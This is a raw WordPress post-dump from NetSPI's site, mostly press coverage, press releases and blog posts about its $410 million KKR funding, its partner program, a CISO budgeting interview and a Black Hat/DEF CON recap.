On October 5, NetSPI was featured in the SecurityWeek article called KKR Boosts NetSPI Stake with $410 Million Investment. Read the preview below or view it online.
The new funding gives Minneapolis-based NetSPI an extended runway to compete and find profits in the fast-growing attack surface management business. NetSPI offers a cloud-based delivery model that allows customers to perform always-on continuous testing to monitor their attack surface and execute attack scenarios based on real-world attacker tactics, either as a single attack technique or a full attack chain using one pre-built playbook.
In December 2020, NetSPI acquired Silent Break Security, a Utah-based security testing firm that offers network and application testing, red teaming, and adversary simulation. Terms of that deal were not disclosed.
NetSPI says it has found traction with a suite of offensive security solutions – Attack Surface Management, Penetration Testing as a Service (PTaaS), and Breach and Attack Simulation – to help businesses uncover critical security gaps, minimize risk, and reduce the likelihood of a security incident.
The NetSPI funding for continuous attack surface management technology comes just days after the U.S. government’s cybersecurity agency CISA issued mandatory instructions for federal agencies to improve automated asset discovery and vulnerability detection capabilities.
According to the CISA, the binding operational directive is meant to help federal agencies improve their cybersecurity management capabilities by gaining visibility into all assets in their networks and the vulnerabilities impacting them.
Federal agencies have been given six months to identify network-addressable IP assets in their environments, along with the associated IP addresses (hosts), as well as to discover and report suspected vulnerabilities on those assets, including misconfigurations, outdated software, and missing patches.
The government’s push is sure to attract more attention to the attack surface management category, which has grown in importance to solve problems with vulnerability and patch management, especially for software and other assets that are exposed to the internet. The technology is meant to address gaps in point-in-time penetration testing and vulnerability management and is a highly competitive category with multiple startups jostling for market share.
[post_title] => SecurityWeek: KKR Boosts NetSPI Stake with $410 Million Investment
[post_excerpt] => NetSPI was featured in the Security Week article called KKR Boosts NetSPI Stake with $410 Million Investment.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => security-week-kkr-boosts-netspi-investment
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:10
[post_modified_gmt] => 2023-01-23 21:10:10
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28559
[menu_order] => 73
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[18] => WP_Post Object
(
[ID] => 28561
[post_author] => 91
[post_date] => 2022-10-05 09:00:00
[post_date_gmt] => 2022-10-05 14:00:00
[post_content] =>
On October 5, NetSPI was featured in the SiliconANGLE article called Cybersecurity provider NetSPI nabs $410M investment from KKR. Read the preview below or view it online.
+ + +
Cybersecurity services and software provider NetSPI LLC today announced that it has received $410 million in growth funding from private equity firm KKR.
NetSPI will use the capital to grow its workforce, develop new technologies and expand its international business operations. The company added that a part of the funding from KKR will go toward recapitalizing its first institutional investor, private equity firm Sunstone Partners. NetSPI previously raised $90 million last May from KKR and Ten Eleven Ventures.
Minneapolis-based NetSPI helps companies find and fix vulnerabilities in their technology infrastructure. NetSPI can launch a simulated cyberattack against an organization’s network to find potential weak points. In addition to uncovering vulnerabilities, such simulated cyberattacks enable companies to measure how quickly they can resolve a network breach and find opportunities for improvement.
On October 5, NetSPI was featured in The Business Journal's article called Cybersecurity company NetSPI raises $410M from KKR. Read the preview below or view it online.
+ + +
NetSPI, a Minneapolis-based cybersecurity company, announced Wednesday that it has raised $410 million in growth funding from investment firm KKR.
The new financing adds to previous funds the New York City-based investment firm had invested in the company last year alongside cybersecurity-focused venture capital firm Ten Eleven Ventures, a deal that totaled $90 million, the Business Journal reported.
[post_title] => The Business Journal: Cybersecurity company NetSPI raises $410M from KKR
[post_excerpt] => NetSPI was featured in The Business Journal's article called Cybersecurity company NetSPI raises $410M from KKR.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => the-business-journal-netspi-raises-410m
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:10
[post_modified_gmt] => 2023-01-23 21:10:10
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28563
)
[20] => WP_Post Object
(
[post_date] => 2022-10-05 06:35:00
New investment to fuel the offensive security leader’s record-breaking growth and innovation pipeline.
Minneapolis, MN – NetSPI, a leader in enterprise penetration testing and attack surface management, today announced that global investment firm KKR is increasing its investment in the company with $410 million in new funding. The growth investment validates NetSPI’s significant outperformance since KKR’s initial investment in May 2021 and will support NetSPI’s continued technology innovation, talent acquisition, and global expansion, as well as recapitalizing NetSPI’s first institutional investor Sunstone Partners.
Enterprises rely on NetSPI’s comprehensive suite of offensive security solutions – Attack Surface Management, Penetration Testing as a Service (PTaaS), and Breach and Attack Simulation – to uncover critical security gaps, minimize risk, and reduce the likelihood of a security incident. Founded in 2001, NetSPI leverages its ‘technology powered, human delivered’ penetration testing approach to improve the security of organizations globally, including the top financial institutions, largest cloud providers, leading healthcare organizations, and many of the Fortune 500.
“We are excited to double down on our investment in NetSPI to help build a differentiated leader in offensive cyber security,” said Jake Heller, Partner and Head of KKR’s Technology Growth team in the Americas. “We have been very impressed by the performance of the company and the exceptional execution by Aaron and his team over the past 18 months. We believe this is just the beginning of what we can accomplish together.”
“We’re both grateful and proud of the industry disruption we drove during our partnership with Sunstone Partners,” said Aaron Shilts, CEO at NetSPI. “As we look forward to this next chapter, NetSPI will continue to challenge the status quo in offensive security. With KKR’s support, we are well positioned to amplify our success building the best teams, developing new technologies, and delivering excellence, so that the world’s most prominent organizations can innovate with confidence.”
NetSPI has consistently outpaced growth forecasts. Over the past five years, the company has grown its revenue five-fold, exceeding 50 percent organic revenue growth in 2021 and 61 percent growth in 2022 to date. Key growth drivers include:
NetSPI’s Penetration Testing as a Service (PTaaS) delivery model, where human ingenuity and novel technologies intersect to create consistent, scalable, and efficient pentesting results.
The acquisition of Silent Break Security, which added additional offensive testing expertise and talent depth, along with innovative technologies that have expanded NetSPI’s global offerings.
The introduction of Attack Surface Management to identify and protect the unknown with continuous penetration testing and manual exposure triaging.
The NetSPI University training program which enables NetSPI to develop the next generation of cybersecurity talent through formal curriculum and hands-on labs and mentorship, resulting in the most comprehensive training and certification program in security testing.
Continuous advancement and innovation across all three technology platforms – ASM, Resolve, and AttackSim – to enable teams to deliver more accessible and impactful results.
Establishing strong teams in Canada, EMEA, and India as a key component of the company’s global expansion efforts.
NetSPI’s ability to recruit and retain top industry talent. The company recently reached the milestone of more than 400 offensive security professionals globally.
“NetSPI continues its trajectory of strong, and accelerating, organic growth and profitability and we are excited about the opportunity to continue this momentum with further investments in technology, people, geographical expansion and strategic acquisitions,” said Ben Pederson, a Director on KKR’s Technology Growth team. “Penetration testing is an increasingly important and strategic aspect to any enterprise’s security posture and we believe NetSPI is a category defining player in the space through their best-in-class technology and PTaaS delivery model. We look forward to supporting NetSPI’s continued growth on a global scale.”
“Following our investment in 2017, we’ve had the pleasure of working closely with NetSPI’s team as the company evolved and established itself as the high-growth, profitable security leader it is today,” said Gustavo Alberelli, Co-Founder & Managing Partner at Sunstone Partners. “This transaction demonstrates that even during these turbulent times, cybersecurity market leaders such as NetSPI will remain highly valuable – especially those providing mission critical solutions to global enterprise customers. We’ve enjoyed having KKR as co-investors since 2021 and look forward to watching NetSPI’s continued success in the future.”
This investment follows NetSPI’s most recent $90 million funding round from KKR and cybersecurity specialist investor Ten Eleven Ventures and comes from KKR’s Technology Growth strategy, which is dedicated to growth equity investment opportunities in leading high-growth technology companies in North America, Europe and Israel.
The transaction will close by the end of 2022, subject to customary regulatory approvals. Goodwin Procter LLP advised NetSPI on the transaction and Latham & Watkins LLP advised KKR.
About NetSPI
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – attack surface management, penetration testing as a service, and breach and attack simulation. Through a combination of technology innovation and human ingenuity we help organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, NetSPI’s global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, three of the five largest healthcare companies, the leading cloud providers, and many of the Fortune® 500. NetSPI is a KKR and Ten Eleven Ventures portfolio company and is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. For additional information, visit www.netspi.com or follow us on LinkedIn or Twitter.
About KKR
KKR is a leading global investment firm that offers alternative asset management as well as capital markets and insurance solutions. KKR aims to generate attractive investment returns by following a patient and disciplined investment approach, employing world-class people, and supporting growth in its portfolio companies and communities. KKR sponsors investment funds that invest in private equity, credit and real assets and has strategic partners that manage hedge funds. KKR’s insurance subsidiaries offer retirement, life and reinsurance products under the management of Global Atlantic Financial Group. References to KKR’s investments may include the activities of its sponsored funds and insurance subsidiaries. For additional information about KKR & Co. Inc. (NYSE: KKR), please visit KKR’s website at www.kkr.com and on Twitter @KKR_Co.
About Sunstone Partners
Sunstone Partners is a growth-oriented private equity firm that makes majority and minority investments in technology-enabled services and software businesses. Recently recognized as one of Inc.’s 50 founder-friendly private equity firms for entrepreneurs, the firm seeks to partner with exceptional management teams, often as their first institutional capital partner, to help accelerate organic growth and fund acquisitions. Founded in 2015, the firm has $1.7 Billion of committed capital. For more information, visit www.sunstonepartners.com.
[post_title] => NetSPI Raises $410 Million in Growth Funding from KKR
[post_modified] => 2023-01-23 15:10:13
[guid] => https://www.netspi.com/?p=28488
)
[21] => WP_Post Object
(
[post_date] => 2022-09-29 09:00:00
Penetration testing leader joins list of organizations empowering individuals and businesses to bolster proactive cybersecurity measures.
Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, has signed on as an official Champion of Cybersecurity Awareness Month 2022, an annual initiative held each October to promote cybersecurity awareness and best practices. The Cybersecurity Awareness Month Champions Program is a collaborative effort among businesses, government agencies, colleges and universities, associations, nonprofit organizations, and individuals committed to the growing importance of cybersecurity in society.
Cybersecurity Awareness Month is co-led by the National Cybersecurity Alliance and the Cybersecurity and Infrastructure Security Agency (CISA). This year’s campaign theme is “See Yourself in Cyber,” demonstrating that while cybersecurity may seem like a complex subject, ultimately, it’s really about people.
“Technology cannot solve our greatest cybersecurity challenges – at least, not on its own. People are our greatest asset in providing security for individuals, organizations, and the nation,” said Heather Crosley, VP of People Operations at NetSPI. “Empowering people to make smart decisions, supporting limited resources with technology innovation, and fostering the next generation of skilled cyber talent are three critical ways we can combat sophisticated cybersecurity threats in both the private and public sectors.”
To encourage individuals to explore a career in penetration testing and help lessen the current skills gap, NetSPI developed NetSPI University (NetSPI U), an extensive entry-level training program where candidates gain a baseline skill set to execute web application and external network penetration tests. Led by NetSPI’s own expert pentesters, NetSPI U features classroom-based learning, hands-on labs, and opportunities to shadow some of the most brilliant minds in cybersecurity. Trainees also can contribute to new and innovative pentesting tools, techniques, and methodologies.
Crosley added: “The industry needs people who are self-starters, curious, eager to learn, and want to make a difference in society at large. From there, the rest can be developed by supporting career-oriented initiatives like NetSPI U.”
About NetSPI
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – attack surface management, penetration testing as a service, and breach and attack simulation. Through a combination of technology innovation and human ingenuity, NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, three of the five largest healthcare companies, the leading cloud providers, and many of the Fortune® 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow us on Facebook, Twitter, and LinkedIn.
About Cybersecurity Awareness Month
Cybersecurity Awareness Month is designed to engage and educate public- and private-sector partners through events and initiatives with the goal of raising awareness about cybersecurity to increase the resiliency of the nation in the event of a cyber incident. Since the Presidential proclamation establishing Cybersecurity Awareness Month in 2004, the initiative has been formally recognized by Congress, federal, state and local governments and leaders from industry and academia. This united effort is necessary to maintain a cyberspace that is safer and more resilient and remains a source of tremendous opportunity and growth for years to come. For more information, visit staysafeonline.org/cybersecurity-awareness-month/
About National Cybersecurity Alliance
The National Cybersecurity Alliance is a non-profit organization on a mission to create a more secure, interconnected world. We advocate for the safe use of all technology and educate everyone on how best to protect ourselves, our families, and our organizations from cybercrime. We create strong partnerships between governments and corporations to amplify our message and to foster a greater “digital” good. National Cybersecurity Alliance’s core efforts include Cybersecurity Awareness Month (October); Data Privacy Week (Jan. 24-28th); and CyberSecure My Business™, which offers webinars, web resources and workshops to help businesses be resistant to and resilient from cyberattacks. For more information, please visit https://staysafeonline.org.
It’s time to tackle the elephant in the room. The often awkward and uncomfortable conversation every CISO must hold with their board and executive teammates around this time of year. That’s right – we’re talking cybersecurity budget and metrics.
‘Tis the season for planning your cybersecurity activities. With rising threats and increasing breach-related financial repercussions, it’s likely many of us will need to communicate the need for additional dollars and resources. And this is no easy feat.
Podcast host and NetSPI Managing Director Nabil Hannan asked three experienced CISOs — Cecil Pineda (R1 RCM), Rob LaMagna-Reiter (Hudl), and Samir Sherif (Imperva) — for tips on measuring security ROI and how to communicate budgeting needs. Here is what they had to say.
What metrics are effective when presenting your cybersecurity budget needs to the board or C-Suite?
Cecil Pineda, SVP/CISO at R1 RCM: Today, we're seeing a lot of usable metrics. Some organizations like to look at the negatives. You could highlight all the incidents that you've experienced, how many risks you have in a risk register, how many non-compliant items are in your compliance programs, and how many risks are critical, medium, or low.
For many years, I felt fear, uncertainty, and doubt. This can be useful, but it doesn't always help me communicate my needs. My leadership team was in on our security program, asking where our competitors are at. How does our program benchmark against others in our industry? Where do we want our scores to be?
Maturity metrics, particularly the NIST Cyber Security Framework (CSF) metrics and the Capability Maturity Model Integration (CMMI) framework, have helped me measure my program. For example, in the healthcare industry, the average CSF score is about 2.8 or 2.9. If you start your program at 2.3, you have to think about how do I get to 2.8? Though, ideally, you want to target higher than 2.8 so that you're aiming above the industry average.
Then, identify all the opportunities to get there. It could be people, it could be processes, or it could be technologies. These are the things that we need to improve.
Samir Sherif, CISO at Imperva: My focus has always been less about specific data points. If you're running one program, it’s less about getting numbers off that program to show value. For example, if it's a vulnerability management program, it's not just about reducing vulnerabilities.
How is security making a difference in generating more revenue for the business? How is that adding value to improve customer communications or reduce risks for the organization? That's what they really care about and look for.
At the end of the day, we are risk leaders. That's all we are. But we have to have the same kinds of conversation as the IT and engineering leads might around providing value and building efficiency over time.
So, the metrics I've leveraged are a combination of showing risk data, but also resiliency data. It's a combination of how my capabilities, programs, and the leaders that work for me are delivering to help move the needle and enable the business to move faster and grow. And that's what really resonates with senior leaders and the board. Ultimately, you end up getting more budget to build upon that.
Rob LaMagna-Reiter, CISO at Hudl: I've searched and searched, and to date, I've not found a single, consistent, reliable metric that can make the case for more budget or showcase ROI.
With that said, there are several areas that you can consider. First off, everything is personalized. But I'll try to provide some examples of tactics I've used in the past that start very generally, and over time, you can tweak those to your specific business.
Let's say you're starting out and you're convinced that you're seeing an underinvestment in information security. There are plenty of benchmarks out there, everything from the security dollar spent per full-time employee, security budget as a percentage of the IT budget, security budget as a percentage of revenue, and so forth.
You can use those low, moderate, or high averages as benchmarks to showcase where you fall along that path. There's also something called the “cybersecurity poverty line” that was illustrated many years ago. It showcases organizational revenue and resources and helps illustrate where along that line organizations possibly are investing versus where they shouldn't be investing.
You can also use business drivers, such as acquisitions. You can formulate a weighted average cost per IT asset required for security. Then, as the business grows, security is already an assumed cost of doing business. Most importantly, I found that it always needs to be aligned with that business growth in the strategic objective.
These are a few ways to get started. As you're working through your program, it is important to understand what business leaders care about. Have you enabled my availability and uptime? Have you shown improvement year over year? There are always parts of the business that are growing faster than the overall weighted average of either revenue or top line growth. You need to be increasingly aware of the scope of those situations and how it impacts security.
Remember, it's not that the board and leadership team don't want to spend on security; they just want to know that the resources and the budget will enable the growth in business resiliency.
Many of the examples I’ve shared have dollar value components, but it requires a lot of analysis and partnership with business units to get to an agreed-upon state so we can showcase both budget asks that are rooted in reality, as well as ROI. I wish there was an easy figure or benchmark I can provide you, but everything is very personal to your business.
It requires a solid relationship with not just your CFO leadership team but across all of your peers and board to make sure that we're all on this journey together. We're not going to get everything we want every single year. But if we're making incremental and iterative improvements in the right direction, you've done your job as a security leader.
Beyond metrics and objective data, are there other tactics that work well for you when communicating your cybersecurity budgeting needs?
Cecil Pineda: There are many ways to communicate without data. I’ve learned this from many great CISOs before me. One of the most effective tools in our arsenal is storytelling. You can tell a really good story, but you have to align it to your leaders.
Today, a lot of our board of directors and senior leadership are tech savvy. We see it in the news. They know all the risks and threats and all these security controls that are at our disposal. Having a good story to tell that includes here's where we are and here are some of our challenges is important.
There are so many things that can’t make it into a slide deck. When I'm presenting, I always try to make sure that I tell the story behind those metrics. Those stories are very powerful. When I was a first-time CISO, I'll be honest with you, I didn't know how to tell a story. I was just relying on data always. But it wasn't enough.
As I went on to different companies and different roles, I’ve learned how to craft a strong story. I recently learned that my CIO is actually a former CISO and an academic. I listen to him and I watch him. I'm still amazed how he can tell a really good story and be able to drive people together and gain support with stories.
Samir Sherif: Before you even build any ROI models or metrics, make friends with your CFO and CFO teams. At the end of the day, they're the ones who are going to help you keep the lights on and also make sure that you're budgeting and spending appropriately.
Being at the table and not thinking that cybersecurity is a priority everybody needs to worry about is concerning. Just like an athlete needs to worry about their health, cyber professionals need to worry about the health of their organization. But there's also performance demand, right?
Being a part of a team that can have a good conversation around what's the greater objective and strategy is key. Helping influence that strategy is important to be successful in the field that we're in.
Rob LaMagna-Reiter: I like to take real business workflows or issues in the organization and help paint a picture and showcase what operations would be like if my ask, or if an above-average project, is approved.
It’s about connecting those crown jewels in the business to something that leadership knows is tangible. They want to be able to see the benefits and efficiencies. You have to remember, at the end of the day, nobody cares about cybersecurity or information security as much as we do. They do care, but it's not their day-to-day as it is ours.
It’s about storytelling versus fear-mongering. Over coffee or lunch, get to know your leadership team’s motivations. And don't always assume the worst case scenario. Always approach them with empathy.
Showcase cybersecurity against peers within our verticals or organizations of other similar sizes. Tie it to the business initiatives and showcase why it is necessary and clearly state what your recommendations are.
Something that I've learned over time is you never want to leave with only one recommendation. You always want to offer leadership, at minimum, two options. One is obviously going to be your preferred path. But leadership will want to see that you've thought through some of the ramifications. Get creative. There are always going to be trade-offs. Leadership will appreciate the time and effort and will take your recommendation to heart and open it up for discussion. Tunnel vision can sometimes lead to less budget getting approved.
Listen to the full episodes of the Agent of Influence podcast online, or wherever you listen to podcasts:
[post_title] => CISO Perspectives: Cybersecurity Budgeting Edition
[post_modified] => 2023-01-23 15:10:14
[guid] => https://www.netspi.com/?p=28454
)
[23] => WP_Post Object
(
[post_date] => 2022-08-26 11:03:13
NetSPI was named a top penetration testing provider in GRC Outlook's Top 10 Penetration Testing Providers 2022. Read the preview below or view it online.
+++
Ever since cybersecurity has been expanding its reach with innovations, there has also been an increasing number of cyber-attacks. This means that as technology expands, cybercriminals are also increasing their potential and power. The recent global shutdown and remote work culture have greatly affected the increase in cybersecurity threats too. A lot of businesses rely on penetration testing tools to enhance their security as well as to find possible penetrations in their security architecture.
Today, penetration testing practices and solutions have evolved from being a completely manual and tedious process to a more automated and highly propagated process. With the advent of artificial intelligence and machine learning, penetration testing solutions are also improving dramatically. AI and ML not only gather all the information automatically but also analyze it and determine different courses of action, thus significantly improving the penetration testing results. AI and ML could help the pen tester understand the results of the scans by analyzing them and removing noise, taking into consideration information gathered from the previous phase combined with threat intelligence.
However, with numerous solutions and providers in the industry, businesses are finding it hard to choose the right solutions provider that exactly fits their unique requirements. That’s why we’ve developed this special edition on Penetration Testing Solution Providers 2022. This special edition features some of the most innovative solution providers selected by our panel of researchers, editors, CTOs and cybersecurity professionals.
On July 20, NetSPI was listed as a top vendor in eSecurity Planet's Top 20 Breach and Attack Simulation (BAS) Vendors for 2022. Read the preview below or view it online.
+++
Breach and attack simulation (BAS) remains a newer IT security technology, but its capabilities are increasingly essential to vigilance in a world of zero-day threats.
BAS can automatically spot vulnerabilities in an organization’s cyber defenses, akin to continuous, automated penetration testing. More than just pen testing and red team insights, BAS solutions often recommend and prioritize remediation to maximize security resources and minimize cyber exposure.
A few years into BAS’s entry into the cybersecurity marketplace, vendors range from startups to fast-growing mid-sized companies and vulnerability-focused enterprise companies. Some consolidation has already taken place, but more will come and the race to obtain a sustainable market share is far from over.
As the market develops, several vendors refer to advanced BAS solutions as security validation. Artificial intelligence and machine learning are an increasingly important part of this market, as automated cybersecurity tools need to be able to adjust as new threats emerge.
Top Breach & Attack Simulation Solutions
This roundup dives into the best in the BAS market, from the top-tier solutions to companies on the rise and honorable mentions.
[post_title] => eSecurity Planet: Top 20 Breach and Attack Simulation (BAS) Vendors for 2022
[post_modified] => 2023-01-23 15:10:18
[guid] => https://www.netspi.com/?p=28254
)
[25] => WP_Post Object
(
[post_date] => 2022-08-23 08:30:00
With another year at Black Hat USA and DEF CON behind us, it’s time to reflect on some of the top takeaways, trending themes, and noteworthy best practices overheard across Vegas. In case you missed it, here’s what we were up to and what caught our attention at this year’s conferences:
NetSPI’s Nick Landers Briefs Black Hat Attendees on the Latest Kerberos Research
NetSPI’s Head of Adversarial R&D Nick Landers presented his latest research on Kerberos alongside James Forshaw, security researcher at Google Project Zero.
Nick and James’ research revealed that while Kerberos should be the recommended long-term solution for network authentication in Windows networks, it shouldn't be considered more secure than its predecessors. What they uncovered is that Kerberos is a complicated protocol, and there has been little deconstruction on how a local machine handles it. This allowed them to expose several bugs within it.
A key takeaway Nick shared is that security teams must look to develop a fundamental understanding of each protocol and how they come into play. Teams shouldn't just look for vulnerabilities; looking for a deeper understanding of how a protocol works will allow teams to better understand its risk locations.
Big picture, Nick hopes to bring further awareness to Kerberos security challenges and “hopes the talk will spur security and network administrators to brush up on their Kerberos knowledge to better harden their systems.” The session slides are now available, or read more in Dark Reading here: “Abusing Kerberos for Local Privilege Escalation.”
The Launch of New, Open-Source Tools & Greater Industry Collaboration
On the first day of Black Hat, we announced the release of two new open-source penetration testing tools developed by NetSPI Senior Director Scott Sutherland. The tools, PowerHuntShares and PowerHunt, help defense, identity and access management (IAM), and security operations center (SOC) teams discover vulnerable network shares and improve detections.
PowerHuntShares is focused on identifying shares configured with excessive permissions and providing data insight to understand how they relate to each other, when they were introduced into the environment, who owns them, and how exploitable they are.
PowerHunt is a threat hunting framework that can be used to quickly collect artifacts commonly associated with malicious behavior. While it calls out suspicious artifacts and statistical anomalies, its greatest value is simply producing data that can be used by other tools during threat hunting exercises.
These new tools emphasize the importance of more open-source collaboration in the information security community. Working together to solve some of the industry's most pressing problems was a powerful theme at this year’s Black Hat, not only with the release of Scott’s tools, but also with the announcement of The Open Cybersecurity Schema Framework, an open project to develop a single, open standard for sharing data. We applaud and support the Open Cybersecurity Schema Framework as a step in the right direction to advance community collaboration.
Penetration Testing Services Continue to Be a Top Priority
As cybersecurity budgets are scrutinized, penetration testing continues to be top of mind for Black Hat attendees. In fact, from our conversations at the NetSPI booth and throughout the show floor, many security teams are looking to complete penetration testing exercises before the end of the year and recognize it as a top priority in their security strategy.
From a managed security service provider (MSSP) perspective, MSSPs are handling an increasing number of requests from their customers asking for penetration testing, as those customers realize the value such exercises can bring to an organization when strengthening its security posture.
While discussing penetration testing services, many attendees on the show floor agreed that there’s an increased focus on continuous testing, and the one unique differentiator in any security service, including pentesting, is the human element – talented people on the front lines working to ensure organizations are properly protected and filling the gaps that tools leave behind. We discuss this topic in one of our recent blog posts: Technology Cannot Solve Our Greatest Cybersecurity Challenges, People Can.
Cloud Security Takes Center Stage as Threats Skyrocket
At DEF CON's Cloud Village, NetSPI Senior Director Karl Fosaaen provided a comprehensive review of the security pitfalls within Azure Automation accounts from his perspective as a cloud pentester. In this presentation, Karl also walked through Azure's permissions model, including security principals and roles, to give people unfamiliar with the topic a better foundational understanding of it.
Overall, the presentation dissected how Automation Accounts may be targeted by attackers and pentesters alike, highlighting a range of vulnerabilities and attacks. Karl left the audience with a plethora of potential Automation Account vulnerabilities to find and secure in their own environments as cloud security threats continue to expand. The session slides are now available here.
In addition to Karl’s talk at DEF CON 30, Thomas Elling, Senior Director of the cloud pentesting practice at NetSPI, joined industry experts from Immuta, OneSpan, Code42, Netskope, and Obsidian in a virtual media panel hosted by Inkhouse in the week prior to Black Hat USA. During the talk, the group outlined the top cloud security threats affecting organizations worldwide, as well as what’s in store for cloud security in the years to come. You can read up on the panel’s main takeaways in this SDxCentral piece: Decentralization Haunts Security, Cloud Transitions.
More Diversity and Inclusion Necessary in the Cybersecurity Industry
At DEF CON’s Girls Hack Village, NetSPI Managing Security Consultant Melissa Miller explored a prevalent topic for women across many industries – imposter syndrome.
During the presentation, Melissa spoke about her personal experiences as a woman navigating a career in cybersecurity and discussed the characteristics of a healthy work environment. She also shared tips on how to spot imposter syndrome, along with immunization strategies and key techniques to identify your strengths and weaknesses and use that information to pursue and achieve your career goals.
Melissa also participated in a panel around diversity in the cybersecurity industry. In this talk, Melissa highlighted that there needs to be more openness around the concept of variety, understanding of people’s differences, and an earnestness to gain different perspectives to lead to more creative problem solving.
Melissa also stressed that diversifying the cybersecurity industry would reduce the 'boys club' stigma that many people associate with it, helping to encourage diverse people to pursue cybersecurity-related degrees, creating better growth and diversity in the cybersecurity workforce as a result.
Both of these presentations echoed a major sentiment at Black Hat USA and DEF CON 30 this year around creating more diversity and inclusivity in the cybersecurity industry, especially as recruiting talent remains a key challenge for the cybersecurity industry.
Live Social Engineering at DEF CON 30
NetSPI consultants enjoyed the Social Engineering Village at DEF CON 30, where NetSPI's on-site social engineering lead Dalin McClellan volunteered. At the village, participants cold-called businesses in real time to see whether they could get employees to share sensitive information. In one instance, the employee disclosed details about building security, including where the cameras were, how badging worked, where employees kept their belongings on shift, and more.
In addition to the news announced and rumblings overheard at Black Hat, our team also noticed that Black Hat and DEF CON were back in full swing, with a crowded show floor, bustling briefing halls, and the industry buzzing in Las Vegas once again.
Amid the crowds, vendors tried to stand out on the show floor with some attention-grabbing activities, like a boxing ring. Several booths had the words “attack surface” front-and-center, proving that Attack Surface Management has become an increased priority for security teams.
With these major security events now behind us, it’s important for the security industry to continue raising awareness and spreading education about some of the important topics discussed on the show floor. As cybercriminals become more sophisticated and well-funded and organizations prioritize cybersecurity, we’ll need continuous collaboration in the industry to better bolster security measures, as well as increase diversity to help amplify and expand defense teams.
What major topics caught your attention at Black Hat or DEF CON? Share them with us on Twitter or LinkedIn.
[post_title] => Top Security Takeaways from Black Hat USA 2022 and DEF CON 30
[post_excerpt] => Read about top security takeaways from Black Hat USA and DEF CON.
[post_name] => top-security-trends-from-black-hat-def-con
[post_modified] => 2023-01-23 15:10:19
[post_modified_gmt] => 2023-01-23 21:10:19
[guid] => https://www.netspi.com/?p=28264
)
[26] => WP_Post Object
(
[ID] => 28282
[post_author] => 91
[post_date] => 2022-08-19 16:34:00
[post_date_gmt] => 2022-08-19 21:34:00
[post_content] =>
On August 19, NetSPI was featured in Channel Futures' article NetSPI Unleashes New Partner Program. Read the preview below or view it online.
+++
NetSPI, a provider of enterprise penetration testing and attack surface management, this week launched its NetSPI Partner Program.
The global program equips channel and technology partners with pentesting tools, services and talent, bolstering security worldwide. Partners can offer end users NetSPI’s vulnerability management technologies and human-delivered offensive security services. That allows both the partner and NetSPI to expand product and service offerings, further develop customer relationships and enter new markets.
Additionally, last month NetSPI joined the AWS Marketplace. That simplifies the procurement process for enterprise organizations with existing AWS relationships by allowing them to purchase NetSPI’s offerings directly via the marketplace.
Lauren Gimmillaro is NetSPI’s vice president of business development and strategic alliances.
“As today’s global attack surface evolves and cybercriminals become more sophisticated in nature, it’s critical to provide end users with the tools, services and skill sets they need to take an offensive approach to security,” she said. “Centered around our customer-first approach, the NetSPI Partner Program will allow our team to extend our world-class pentesting capabilities to a variety of diverse and trusted partners, strengthening organizations’ cyber security efforts across the globe.”
The program includes two partner types:
Channel partners: NetSPI provides its full suite of security services and products through a global channel network of referral and reseller partners. To meet partners’ requirements, the programs include a tier-based model consisting of referral fees, preferred client pricing and reseller discounts.
Technology partners: Security and third-party software companies help build integrations with NetSPI to improve overall customer experiences.
For both, NetSPI offers technical and sales support to help partners achieve their business and GTM goals.
[post_title] => Channel Futures: NetSPI Unleashes New Partner Program
[post_excerpt] => On August 19, NetSPI was featured in Channel Futures' article NetSPI Unleashes New Partner Program.
[post_name] => channel-futures-netspi-unleashes-new-partner-program
[post_modified] => 2023-01-23 15:10:19
[post_modified_gmt] => 2023-01-23 21:10:19
[guid] => https://www.netspi.com/?p=28282
)
[27] => WP_Post Object
(
[ID] => 28256
[post_author] => 91
[post_date] => 2022-08-17 15:35:00
[post_date_gmt] => 2022-08-17 20:35:00
[post_content] =>
On August 17, NetSPI was featured in Channel Marketer Report's With Experienced Channel Leader On Board, NetSPI Launches First Formal Partner Program. Read the preview below or view it online.
+++
NetSPI, an enterprise penetration testing and attack surface management solution provider, has launched its first formalized program to support its global channel and technology partners.
Partners within the program can offer end users NetSPI’s vulnerability management technologies and human-delivered offensive security services, allowing both the partner and NetSPI to expand product and service offerings, further develop customer relationships, and enter new markets.
The program is led by Lauren Gimmillaro, NetSPI’s Vice President of Business Development and Strategic Alliances. Gimmillaro has a track record of launching four successful partner programs, consisting of working with channel, referral, reseller, and technology partners.
The NetSPI Partner Program provides its referral and reseller partners with the company’s full suite of security services and products. To meet partners’ requirements, the programs include a tier-based model consisting of referral fees, preferred client pricing, and reseller discounts, the company said in a press release.
“NetSPI offers free unlimited technical and business training to ensure our partners feel comfortable speaking to NetSPI’s products and services,” Gimmillaro told CMR. “Additionally, we will support our partners with a variety of go-to-market initiatives, which include featuring partners on our blog, LinkedIn announcements, joint one-pagers, co-hosted events and webinars, and more.”
[post_title] => Channel Marketer Report: With Experienced Channel Leader On Board, NetSPI Launches First Formal Partner Program
[post_excerpt] => NetSPI was featured in Channel Marketer Report's article highlighting the launch of our formal Partner Program, led by Lauren Gimmillaro.
[post_name] => channel-marketer-report-netspi-launches-first-formal-partner-program
[post_modified] => 2023-01-23 15:10:20
[post_modified_gmt] => 2023-01-23 21:10:20
[guid] => https://www.netspi.com/?p=28256
)
[28] => WP_Post Object
(
[ID] => 28239
[post_author] => 91
[post_date] => 2022-08-17 08:30:00
